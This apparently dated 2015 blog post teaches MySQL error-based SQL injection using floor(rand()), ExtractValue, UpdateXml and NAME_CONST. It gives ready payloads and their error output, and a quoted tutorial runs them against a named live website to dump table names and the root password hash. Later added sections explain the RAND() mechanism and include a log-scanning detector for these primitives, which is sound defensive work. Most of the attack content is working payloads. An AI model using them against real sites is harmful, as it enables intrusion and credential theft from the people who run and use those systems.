
MySQL error-based injection: three techniques using floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the query you need. For example, to fetch the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
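
Why a GROUP BY over concat(..., floor(rand(0)*2)) ends in a duplicate-key error is not explained above, so here is an added example (my own code, not from the post): a Python model of MySQL's seeded RAND() stream and of the two evaluations a GROUP BY key receives (once to look the group up, once more when a new group is inserted into the temporary table). The generator constants follow my reading of MySQL's my_rnd() routine and the seeding in Item_func_rand and are an assumption, as is the constant version string; the model goes beyond the post by showing that three source rows are the minimum for the collision, which is exactly what the three-row union in Method 2 supplies.

```python
# Added example (not from the original post): a Python re-implementation of
# MySQL's seeded RAND() generator, used to show why the floor(rand(0)*2)
# trick yields a "Duplicate entry" error. The generator follows my reading
# of MySQL's my_rnd() and the seeding used by Item_func_rand
# (seed1 = seed*0x10001 + 55555555, seed2 = seed*0x10000001); treat these
# constants as an assumption, not as page content.
from math import floor

MAX_VALUE = 0x3FFFFFFF


class MySQLRand:
    """Deterministic RAND(seed) stream, advanced once per evaluation."""

    def __init__(self, seed: int) -> None:
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next_double(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE

    def floor_rand_times_2(self) -> int:
        """Value of floor(rand(seed)*2) for one evaluation: always 0 or 1."""
        return floor(self.next_double() * 2)


def rand0_bits(n: int) -> list:
    """First n values of floor(rand(0)*2); the stream starts 0,1,1,0,1,1,0,0."""
    r = MySQLRand(0)
    return [r.floor_rand_times_2() for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062."""


def simulate_group_by(nrows: int, version: str = "5.1.33-community-log") -> dict:
    """Model of: select count(*),concat(version(),floor(rand(0)*2))x ... group by x

    The GROUP BY key is evaluated once to look it up in the temporary table
    and, when the group is new, evaluated AGAIN while inserting the row.
    rand(0) advances on every evaluation, so the inserted key can differ from
    the key that was looked up, and a later row can collide with it.
    """
    rand = MySQLRand(0)
    groups = {}
    for _ in range(nrows):
        key = version + str(rand.floor_rand_times_2())   # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = version + str(rand.floor_rand_times_2())   # evaluation 2: insert
        if key in groups:
            raise DuplicateEntry(
                f"ERROR 1062 (23000): Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


def rows_needed_for_error(version: str = "5.1.33-community-log") -> int:
    """Smallest source-table row count at which the query errors out."""
    n = 1
    while True:
        try:
            simulate_group_by(n, version)
        except DuplicateEntry:
            return n
        n += 1


if __name__ == "__main__":
    print("floor(rand(0)*2) stream:", rand0_bits(8))
    print("rows needed for the error:", rows_needed_for_error())
    try:
        simulate_group_by(3)
    except DuplicateEntry as exc:
        print(exc)
```

The takeaway for a defender is that the failure is fully deterministic: the same seed gives the same 0,1,1 prefix every time, so any source table with at least three rows (information_schema.tables always qualifies) makes the query fail with the concatenated value inside the error text. The enabling weakness is therefore the application echoing database errors to the client, not RAND() itself.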

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Further collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
$ b- }" v. N  i+ T' S. F- O4 Q# l
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
6 r! \# N) E2 w; E% u; ^
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
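
On the detection side, every payload shape on this page relies on a small set of function names (floor(rand()), extractvalue, updatexml, name_const), and the technique only succeeds when the raw database error text reaches the HTTP client. The following added Python (my own code, not from the post or its quoted tutorial) scans constructed web-server access-log lines for those primitives after URL decoding, and checks a response body for the error strings that leak the extracted value. The log lines, client addresses and the Combined Log Format regex are assumptions made for the example.

```python
# Added example (not from the original post): defensive detection of the
# error-based primitives discussed above in access-log lines, plus a check
# for the MySQL error strings that make the technique work when they reach
# the HTTP response. All sample log lines below are constructed.
import re
from urllib.parse import unquote_plus

# Each pattern names the error-based primitive it matches; applied
# case-insensitively to the URL-decoded query string.
PRIMITIVES = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "name_const": re.compile(r"name_const\s*\(", re.I),
}

# Server-side error text that discloses the injected expression's value.
ERROR_LEAKS = (
    "Duplicate entry",
    "Duplicate column name",
    "XPATH syntax error",
)

# Combined Log Format (assumed layout): client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')


def classify_request(target: str) -> list:
    """Return the names of error-based primitives found in a request target."""
    if "?" not in target:
        return []
    decoded = unquote_plus(target.split("?", 1)[1])   # '+' and %xx both decoded
    return [name for name, pat in PRIMITIVES.items() if pat.search(decoded)]


def scan_access_log(lines: list) -> list:
    """Return (client, status, primitives) for each request carrying one."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # unparseable line: skip rather than mis-attribute
        found = classify_request(m.group("target"))
        if found:
            hits.append((m.group("client"), int(m.group("status")), found))
    return hits


def leaks_db_error(body: str) -> bool:
    """True if an HTTP response body echoes a MySQL error string verbatim."""
    return any(marker in body for marker in ERROR_LEAKS)


# Constructed sample lines (not real traffic); the query strings reuse the
# payload shapes shown on this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330 HTTP/1.1" 200 4120',
    '203.0.113.5 - - [11/Nov/2015:19:03:41 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 512',
    '198.51.100.7 - - [11/Nov/2015:19:04:02 +0800] "GET /detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 480',
    '198.51.100.7 - - [11/Nov/2015:19:04:09 +0800] "GET /detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 530',
]

if __name__ == "__main__":
    for client, status, found in scan_access_log(SAMPLE_LOG):
        print(f"{client} status={status} primitives={found}")
```

A 500 status paired with one of these primitives is a strong signal on its own; the leaks_db_error check is the one to run against the application's actual error page, because returning a generic error page instead of the driver message removes the channel all three techniques (and the name_const variant) depend on, even where the injection itself has not yet been fixed with parameterized queries.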